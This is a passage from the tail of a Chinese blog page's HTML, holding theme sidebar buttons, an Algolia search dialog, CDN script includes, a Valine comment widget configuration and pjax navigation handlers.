title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr/><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fas fa-times"></i></span></div><div id="search-mask"></div><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/vanilla-lazyload/dist/lazyload.iife.min.js"></script><script src="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.js"></script><script src="/js/search/algolia.js"></script><script>var endLoading = function () {
  document.body.style.overflow = 'auto';
  document.getElementById('loading-box').classList.add("loaded")
}
window.addEventListener('load',endLoading)</script><div class="js-pjax"><script>function loadValine () {
  function initValine () {
    window.valine = new Valine({
      el: '#vcomment',
      appId: 'qO0vGOSP3H6WgC5HqXaeD8kO-gzGzoHsz',
      appKey: 'v1cy5nxt6U9wyUjvBVdUqfX2',
      placeholder: '风过留痕，雁过留声，人过留影，可以在这里留下你的足迹',
      avatar: 'monsterid',
      meta: 'nick,mail,link'.split(','),
      pageSize: '10',
      lang: 'zh-CN',
      recordIP: true,
      serverURLs: '',
      emojiCDN: '',
      emojiMaps: "",
      enableQQ: false,
      path: window.location.pathname,
    });
    if ('nick,mail') { valine.config.requiredFields= 'nick,mail'.split(',') }
  }

  if (typeof Valine === 'function') initValine() 
  else $.getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js', initValine)
}

if ('Valine' === 'Valine' || !true) {
  if (true) btf.loadComment(document.querySelector('#vcomment'),loadValine)
  else setTimeout(() => loadValine(), 0)
} else {
  function loadOtherComment () {
    loadValine()
  }
}</script></div><div class="aplayer no-destroy" data-id="1526227571" data-server="tencent" data-type="playlist" data-fixed="true" data-mini="true" data-listFolded="false" data-order="list" data-preload="none" data-autoplay="false" data-lrctype="1" muted></div><script src="https://cdn.jsdelivr.net/npm/hls.js"></script><script src="/js/backgroud_jungle.js"></script><script defer="defer" id="ribbon" src="/js/third-party/canvas-ribbon.js" size="150" alpha="0.6" zIndex="-1" mobile="false" data-click="false"></script><script src="/js/third-party/activate-power-mode.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = false;
document.body.addEventListener('input', POWERMODE);
</script><script src="/js/third-party/click_heart.js" async="async"></script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/gh/metowolf/MetingJS@1.2/dist/Meting.min.js"></script><script src="https://cdn.jsdelivr.net/npm/pjax/pjax.min.js"></script><script>let pjaxSelectors = [
  'title',
  'meta[name=description]',
  '#config_change',
  '#body-wrap',
  '#rightside-config-hide',
  '#rightside-config-show',
  '.js-pjax'
]

if (false) {
  pjaxSelectors.unshift('meta[property="og:image"]', 'meta[property="og:title"]', 'meta[property="og:url"]')
}

var pjax = new Pjax({
  elements: 'a:not([target="_blank"]):not([href="/music/"]):not([href="/no-pjax/"])',
  selectors: pjaxSelectors,
  cacheBust: false,
  analytics: false,
  scrollRestoration: false
})

document.addEventListener('pjax:complete', function () {
  window.refreshFn()

  $('script[data-pjax]').each(function () {
    $(this).parent().append($(this).remove())
  })

  GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()

  typeof chatBtnFn === 'function' && chatBtnFn()
  typeof panguInit === 'function' && panguInit()

  if (typeof gtag === 'function') {
    gtag('config', '', {'page_path': window.location.pathname});
  }

  typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length && loadMeting()

  // Analytics
  if (false) {
    MtaH5.pgv()
  }

  // prismjs
  typeof Prism === 'object' && Prism.highlightAll()
})


document.addEventListener('pjax:send', function () {
  if (window.aplayers) {
    for (let i = 0; i < window.aplayers.length; i++) {
      if (!window.aplayers[i].options.fixed) {
        window.aplayers[i].destroy()
      }
    }
  }

  typeof typed === 'object' && typed.destroy()

  $(window).off('scroll')

  //reset readmode
  $('body').hasClass('read-mode') && $('body').removeClass('read-mode')

})</script></div></body></html>